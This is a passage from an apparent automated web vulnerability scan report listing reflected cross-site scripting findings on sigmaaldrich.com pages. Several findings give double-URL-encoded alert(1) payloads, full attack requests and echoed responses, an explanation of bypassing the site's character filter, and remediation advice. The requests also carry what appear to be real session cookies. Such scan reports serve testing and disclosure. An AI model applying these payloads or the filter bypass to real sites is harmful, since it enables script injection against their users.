WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28929
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-levelbbe14";alert(1)//6b22372e485/corporate.html","E404") ;
   </script>
...[SNIP]...

1.624. http://www.sigmaaldrich.com/site-level/corporate.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cbce%2522%253balert%25281%2529%252f%252f662f81ab70a was submitted in the REST URL parameter 2. This input was echoed as 3cbce";alert(1)//662f81ab70a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/3cbce%2522%253balert%25281%2529%252f%252f662f81ab70a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28915
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/3cbce";alert(1)//662f81ab70a","E404") ;
   </script>
...[SNIP]...

1.625. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/business-development.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f768a%2522%253balert%25281%2529%252f%252fc41b2a12d0 was submitted in the REST URL parameter 1. This input was echoed as f768a";alert(1)//c41b2a12d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-levelf768a%2522%253balert%25281%2529%252f%252fc41b2a12d0/corporate/business-development.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-levelf768a";alert(1)//c41b2a12d0/corporate/business-development.html","E404") ;
   </script>
...[SNIP]...

1.626. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/business-development.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 405ea%2522%253balert%25281%2529%252f%252f37b0ed6cdf1 was submitted in the REST URL parameter 2. This input was echoed as 405ea";alert(1)//37b0ed6cdf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/corporate405ea%2522%253balert%25281%2529%252f%252f37b0ed6cdf1/business-development.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/corporate405ea";alert(1)//37b0ed6cdf1/business-development.html","E404") ;
   </script>
...[SNIP]...

1.627. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/business-development.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ac18%2522%253balert%25281%2529%252f%252f23d3c813656 was submitted in the REST URL parameter 3. This input was echoed as 9ac18";alert(1)//23d3c813656 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/corporate/9ac18%2522%253balert%25281%2529%252f%252f23d3c813656 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28925
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/corporate/9ac18";alert(1)//23d3c813656","E404") ;
   </script>
...[SNIP]...

1.628. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/investor-relations.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13634%2522%253balert%25281%2529%252f%252f32b9ba8d555 was submitted in the REST URL parameter 1. This input was echoed as 13634";alert(1)//32b9ba8d555 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level13634%2522%253balert%25281%2529%252f%252f32b9ba8d555/corporate/investor-relations.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 